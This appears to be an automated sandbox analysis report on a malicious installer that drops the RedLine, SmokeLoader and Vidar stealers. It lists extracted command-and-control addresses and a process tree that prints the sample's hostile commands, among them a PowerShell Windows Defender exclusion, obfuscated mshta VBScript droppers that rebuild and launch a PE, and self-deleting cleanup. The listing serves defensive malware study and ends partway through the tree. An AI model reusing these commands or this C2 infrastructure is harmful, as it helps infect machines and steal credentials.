Resubmissions

13-10-2021 18:35

211013-w8lxmaegdr 10

13-10-2021 12:38

211013-pvkdbadhdm 10

13-10-2021 05:30

211013-f7nrtsdfa3 10

12-10-2021 20:25

211012-y7qwasdbh4 10

11-10-2021 21:02

211011-zvywtaabdq 10

Analysis

  • max time kernel
    126s
  • max time network
    597s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    11-10-2021 21:02

General

  • Target

    setup_x86_x64_install.exe

  • Size

    3.4MB

  • MD5

    26f28bf2dc2b6afc0dd99cb6ea3879b8

  • SHA1

    9270b9f48e2d14cc2cbed61ee2e2389d5f69ce05

  • SHA256

    5f30eae71c1b0d08e7ec5adfc9a0dc98078595502b60a584a8df5cdf8cacf7fa

  • SHA512

    5a350373e87673c9ba39e5353bea1d7c1f2f7bc62a703ed13e892e69037008f3e2accadbdd0ec0bd976e54c68b79dfad6fb37517dd55448cac4d9d74ae8a037b

Malware Config

Extracted

Family

redline

Botnet

she

C2

135.181.129.119:4805

Extracted

Family

smokeloader

Version

2020

C2

http://gmpeople.com/upload/

http://mile48.com/upload/

http://lecanardstsornin.com/upload/

http://m3600.com/upload/

http://camasirx.com/upload/

rc4.i32
rc4.i32

Extracted

Family

vidar

Version

41.2

Botnet

933

C2

https://mas.to/@serg4325

Attributes
  • profile_id

    933

Extracted

Family

vidar

Version

41.3

Botnet

921

C2

https://mas.to/@oleg98

Attributes
  • profile_id

    921

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 5 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata: ET MALWARE GCleaner Downloader Activity M5

  • suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

    suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

  • suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

    suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

  • suricata: ET MALWARE Zbot Generic URI/Header Struct .bin

    suricata: ET MALWARE Zbot Generic URI/Header Struct .bin

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 3 IoCs
  • ASPack v2.12-2.42 7 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 63 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Checks BIOS information in registry 2 TTPs 22 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 12 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 5 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 11 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 25 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 11 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 7 IoCs
  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies registry class 15 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
    1⤵
      PID:2424
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2628
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
          PID:2852
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
          1⤵
            PID:2620
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
              PID:2416
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
                PID:1844
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                  PID:1412
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1252
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                    1⤵
                      PID:1232
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                      1⤵
                        PID:1080
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                        1⤵
                          PID:860
                          • C:\Users\Admin\AppData\Roaming\iegcsvr
                            C:\Users\Admin\AppData\Roaming\iegcsvr
                            2⤵
                              PID:7412
                            • \??\c:\windows\system\svchost.exe
                              c:\windows\system\svchost.exe
                              2⤵
                                PID:5796
                            • c:\windows\system32\svchost.exe
                              c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                              1⤵
                                PID:1000
                              • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
                                "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
                                1⤵
                                • Suspicious use of WriteProcessMemory
                                PID:3920
                                • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Suspicious use of WriteProcessMemory
                                  PID:3224
                                  • C:\Users\Admin\AppData\Local\Temp\7zS89CDE644\setup_install.exe
                                    "C:\Users\Admin\AppData\Local\Temp\7zS89CDE644\setup_install.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Suspicious use of WriteProcessMemory
                                    PID:392
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                      4⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:1092
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                        5⤵
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3256
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c Mon20762bc3f6.exe
                                      4⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:936
                                      • C:\Users\Admin\AppData\Local\Temp\7zS89CDE644\Mon20762bc3f6.exe
                                        Mon20762bc3f6.exe
                                        5⤵
                                        • Executes dropped EXE
                                        PID:2020
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c Mon206b909958ed4.exe /mixone
                                      4⤵
                                        PID:1052
                                        • C:\Users\Admin\AppData\Local\Temp\7zS89CDE644\Mon206b909958ed4.exe
                                          Mon206b909958ed4.exe /mixone
                                          5⤵
                                          • Executes dropped EXE
                                          PID:2308
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2308 -s 664
                                            6⤵
                                            • Program crash
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4324
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2308 -s 704
                                            6⤵
                                            • Program crash
                                            PID:5392
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2308 -s 704
                                            6⤵
                                            • Program crash
                                            PID:5848
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2308 -s 632
                                            6⤵
                                            • Program crash
                                            PID:6028
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2308 -s 892
                                            6⤵
                                            • Program crash
                                            PID:5776
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2308 -s 940
                                            6⤵
                                            • Program crash
                                            PID:5956
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2308 -s 1112
                                            6⤵
                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                            • Program crash
                                            PID:6384
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c Mon20927aab1e5.exe
                                        4⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:1124
                                        • C:\Users\Admin\AppData\Local\Temp\7zS89CDE644\Mon20927aab1e5.exe
                                          Mon20927aab1e5.exe
                                          5⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          PID:2928
                                          • C:\Users\Admin\AppData\Local\Temp\7zS89CDE644\Mon20927aab1e5.exe
                                            C:\Users\Admin\AppData\Local\Temp\7zS89CDE644\Mon20927aab1e5.exe
                                            6⤵
                                            • Executes dropped EXE
                                            PID:4728
                                          • C:\Users\Admin\AppData\Local\Temp\7zS89CDE644\Mon20927aab1e5.exe
                                            C:\Users\Admin\AppData\Local\Temp\7zS89CDE644\Mon20927aab1e5.exe
                                            6⤵
                                            • Executes dropped EXE
                                            PID:5000
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c Mon204014f13870f5e.exe
                                        4⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:1176
                                        • C:\Users\Admin\AppData\Local\Temp\7zS89CDE644\Mon204014f13870f5e.exe
                                          Mon204014f13870f5e.exe
                                          5⤵
                                          • Executes dropped EXE
                                          • Checks SCSI registry key(s)
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious behavior: MapViewOfSection
                                          PID:2380
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c Mon206d48916f93c5.exe
                                        4⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:2280
                                        • C:\Users\Admin\AppData\Local\Temp\7zS89CDE644\Mon206d48916f93c5.exe
                                          Mon206d48916f93c5.exe
                                          5⤵
                                          • Executes dropped EXE
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2096
                                          • C:\Users\Admin\AppData\Roaming\5482273.scr
                                            "C:\Users\Admin\AppData\Roaming\5482273.scr" /S
                                            6⤵
                                            • Executes dropped EXE
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1652
                                          • C:\Users\Admin\AppData\Roaming\4173937.scr
                                            "C:\Users\Admin\AppData\Roaming\4173937.scr" /S
                                            6⤵
                                            • Executes dropped EXE
                                            • Adds Run key to start application
                                            PID:4052
                                            • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                              "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                              7⤵
                                              • Executes dropped EXE
                                              • Suspicious behavior: SetClipboardViewer
                                              PID:4348
                                          • C:\Users\Admin\AppData\Roaming\6101920.scr
                                            "C:\Users\Admin\AppData\Roaming\6101920.scr" /S
                                            6⤵
                                            • Executes dropped EXE
                                            • Checks BIOS information in registry
                                            • Checks whether UAC is enabled
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            PID:1284
                                          • C:\Users\Admin\AppData\Roaming\2508049.scr
                                            "C:\Users\Admin\AppData\Roaming\2508049.scr" /S
                                            6⤵
                                            • Executes dropped EXE
                                            • Checks BIOS information in registry
                                            • Checks whether UAC is enabled
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            PID:1260
                                          • C:\Users\Admin\AppData\Roaming\5578799.scr
                                            "C:\Users\Admin\AppData\Roaming\5578799.scr" /S
                                            6⤵
                                            • Executes dropped EXE
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1624
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c Mon209c830507d573.exe
                                        4⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:1548
                                        • C:\Users\Admin\AppData\Local\Temp\7zS89CDE644\Mon209c830507d573.exe
                                          Mon209c830507d573.exe
                                          5⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          PID:1060
                                          • C:\Users\Admin\AppData\Local\Temp\7zS89CDE644\Mon209c830507d573.exe
                                            C:\Users\Admin\AppData\Local\Temp\7zS89CDE644\Mon209c830507d573.exe
                                            6⤵
                                            • Executes dropped EXE
                                            PID:4736
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c Mon203f01ac7e6.exe
                                        4⤵
                                          PID:1356
                                          • C:\Users\Admin\AppData\Local\Temp\7zS89CDE644\Mon203f01ac7e6.exe
                                            Mon203f01ac7e6.exe
                                            5⤵
                                            • Executes dropped EXE
                                            PID:3976
                                            • C:\Windows\SysWOW64\mshta.exe
                                              "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS89CDE644\Mon203f01ac7e6.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS89CDE644\Mon203f01ac7e6.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                                              6⤵
                                                PID:4056
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS89CDE644\Mon203f01ac7e6.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS89CDE644\Mon203f01ac7e6.exe" ) do taskkill /F -Im "%~NxU"
                                                  7⤵
                                                    PID:6448
                                                    • C:\Users\Admin\AppData\Local\Temp\09xU.exE
                                                      09xU.EXE -pPtzyIkqLZoCarb5ew
                                                      8⤵
                                                        PID:6628
                                                        • C:\Windows\SysWOW64\mshta.exe
                                                          "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                                                          9⤵
                                                            PID:6972
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"
                                                              10⤵
                                                                PID:7048
                                                            • C:\Windows\SysWOW64\mshta.exe
                                                              "C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )
                                                              9⤵
                                                                PID:4620
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
                                                                  10⤵
                                                                    PID:6920
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /S /D /c" eCHO "
                                                                      11⤵
                                                                        PID:5216
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
                                                                        11⤵
                                                                          PID:4452
                                                                        • C:\Windows\SysWOW64\control.exe
                                                                          control .\R6f7sE.I
                                                                          11⤵
                                                                            PID:7984
                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                              "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
                                                                              12⤵
                                                                                PID:3172
                                                                                • C:\Windows\system32\RunDll32.exe
                                                                                  C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I
                                                                                  13⤵
                                                                                    PID:8132
                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                      "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
                                                                                      14⤵
                                                                                        PID:7276
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /F -Im "Mon203f01ac7e6.exe"
                                                                            8⤵
                                                                            • Kills process with taskkill
                                                                            PID:7128
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c Mon2083f8d8970a0b2d.exe
                                                                    4⤵
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:3196
                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS89CDE644\Mon2083f8d8970a0b2d.exe
                                                                      Mon2083f8d8970a0b2d.exe
                                                                      5⤵
                                                                      • Executes dropped EXE
                                                                      PID:1660
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c Mon20d3b8b752.exe
                                                                    4⤵
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:3708
                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS89CDE644\Mon20d3b8b752.exe
                                                                      Mon20d3b8b752.exe
                                                                      5⤵
                                                                      • Executes dropped EXE
                                                                      • Checks computer location settings
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      PID:2668
                                                                      • C:\Users\Admin\Pictures\Adobe Films\VZh1xbBCOdsIOXvSPKF7azQZ.exe
                                                                        "C:\Users\Admin\Pictures\Adobe Films\VZh1xbBCOdsIOXvSPKF7azQZ.exe"
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        PID:4360
                                                                      • C:\Users\Admin\Pictures\Adobe Films\oRCHFqdZmy2khhDOoweGl5SC.exe
                                                                        "C:\Users\Admin\Pictures\Adobe Films\oRCHFqdZmy2khhDOoweGl5SC.exe"
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        • Drops file in Program Files directory
                                                                        PID:4572
                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                          7⤵
                                                                            PID:6620
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                            7⤵
                                                                              PID:2124
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd0,0xd4,0xd8,0xac,0xdc,0x7ff9f1b04f50,0x7ff9f1b04f60,0x7ff9f1b04f70
                                                                                8⤵
                                                                                  PID:4204
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1676,6690679610323199017,3348270124229935688,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2040 /prefetch:8
                                                                                  8⤵
                                                                                    PID:8028
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1676,6690679610323199017,3348270124229935688,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1736 /prefetch:8
                                                                                    8⤵
                                                                                      PID:1160
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1676,6690679610323199017,3348270124229935688,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1688 /prefetch:2
                                                                                      8⤵
                                                                                        PID:7924
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1676,6690679610323199017,3348270124229935688,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2620 /prefetch:1
                                                                                        8⤵
                                                                                          PID:5952
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1676,6690679610323199017,3348270124229935688,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2612 /prefetch:1
                                                                                          8⤵
                                                                                            PID:5876
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1676,6690679610323199017,3348270124229935688,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1
                                                                                            8⤵
                                                                                              PID:4784
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1676,6690679610323199017,3348270124229935688,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3652 /prefetch:1
                                                                                              8⤵
                                                                                                PID:7692
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1676,6690679610323199017,3348270124229935688,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3804 /prefetch:1
                                                                                                8⤵
                                                                                                  PID:7560
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1676,6690679610323199017,3348270124229935688,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3936 /prefetch:1
                                                                                                  8⤵
                                                                                                    PID:6372
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  "cmd.exe" /C taskkill /F /PID 4572 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Pictures\Adobe Films\oRCHFqdZmy2khhDOoweGl5SC.exe"
                                                                                                  7⤵
                                                                                                    PID:4968
                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                      taskkill /F /PID 4572
                                                                                                      8⤵
                                                                                                      • Kills process with taskkill
                                                                                                      PID:7712
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "cmd.exe" /C taskkill /F /PID 4572 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Pictures\Adobe Films\oRCHFqdZmy2khhDOoweGl5SC.exe"
                                                                                                    7⤵
                                                                                                      PID:3312
                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                        taskkill /F /PID 4572
                                                                                                        8⤵
                                                                                                        • Kills process with taskkill
                                                                                                        PID:7760
                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\AnIurwIv7QoBNM96RI4Tga9c.exe
                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\AnIurwIv7QoBNM96RI4Tga9c.exe"
                                                                                                    6⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Loads dropped DLL
                                                                                                    • Suspicious use of SetThreadContext
                                                                                                    PID:4560
                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\AnIurwIv7QoBNM96RI4Tga9c.exe
                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\AnIurwIv7QoBNM96RI4Tga9c.exe"
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:2360
                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\AnIurwIv7QoBNM96RI4Tga9c.exe
                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\AnIurwIv7QoBNM96RI4Tga9c.exe"
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:2304
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im AnIurwIv7QoBNM96RI4Tga9c.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\AnIurwIv7QoBNM96RI4Tga9c.exe" & del C:\ProgramData\*.dll & exit
                                                                                                        8⤵
                                                                                                          PID:6888
                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                            taskkill /im AnIurwIv7QoBNM96RI4Tga9c.exe /f
                                                                                                            9⤵
                                                                                                            • Kills process with taskkill
                                                                                                            PID:3652
                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                            timeout /t 6
                                                                                                            9⤵
                                                                                                            • Delays execution with timeout.exe
                                                                                                            PID:7412
                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\3Tmr5jh_kySdVK37xBzzw4kL.exe
                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\3Tmr5jh_kySdVK37xBzzw4kL.exe"
                                                                                                      6⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Checks BIOS information in registry
                                                                                                      • Checks whether UAC is enabled
                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                      PID:4684
                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\AgMfDFhPmlwuzGNvuGWYu4fd.exe
                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\AgMfDFhPmlwuzGNvuGWYu4fd.exe"
                                                                                                      6⤵
                                                                                                        PID:4464
                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\AgMfDFhPmlwuzGNvuGWYu4fd.exe
